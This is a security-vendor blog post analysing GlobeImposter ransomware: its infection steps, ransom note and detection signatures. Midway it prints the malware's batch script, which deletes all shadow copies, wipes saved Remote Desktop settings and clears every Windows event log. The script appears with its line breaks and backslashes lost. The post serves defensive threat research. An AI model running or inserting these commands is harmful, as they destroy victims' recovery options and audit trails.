GlobeImposter Ransomware renders system unbootable


The SonicWall Capture Labs Threat Research Team have come across ransomware that goes by the name GlobeImposter. It is also known as Fake Globe. GlobeImposter is distributed via a malicious spam campaign and as with all ransomware encrypts the victims files making them irrevocable without payment. Most ransomware have a built in file extension filter that will leave executable files intact. This ransomware however, encrypts executable files and renders the system unbootable as a result.

Infection Cycle:

Upon execution the Trojan makes the following changes to the filesystem and begins its file encryption process:

  • copies itself to %APPDATA%{original_filename}.exe [Detected as GAV: GlobeImposter.A (Trojan)]
  • creates %ALLUSERSPROFILE%60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE
  • encrypts files and gives them a .TRUE file extension
  • drops how_to_back_files.html into every directory containing encryped files

how_to_back_files.html contains the following html page:

The page contains data on steps needed to recover files. We wrote to and received the following reply:

If %ALLUSERSPROFILE%60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE already exists, the trojan ceases all operations and exits.

60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE contains the following data:

After encrypting files (including .exe files), the Trojan then performs operations to make file restoration difficult. It even clears Windows event logs and removes any saved remote desktop configurations. The following .bat file performs this task before being deleted.

@echo offvssadmin.exe Delete Shadows /All /Quietreg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /freg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /freg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"cd %userprofile%documentsattrib Default.rdp -s -hdel Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

Since the Trojan encrypts critical system files, it renders the machine unbootable:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Globeimposter.RSM (Trojan)
  • GAV: Globeimposter.RSM_2 (Trojan)
  • GAV: Globeimposter.RSM_3 (Trojan)
  • GAV: Globeimposter.RSM_4 (Trojan)
Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.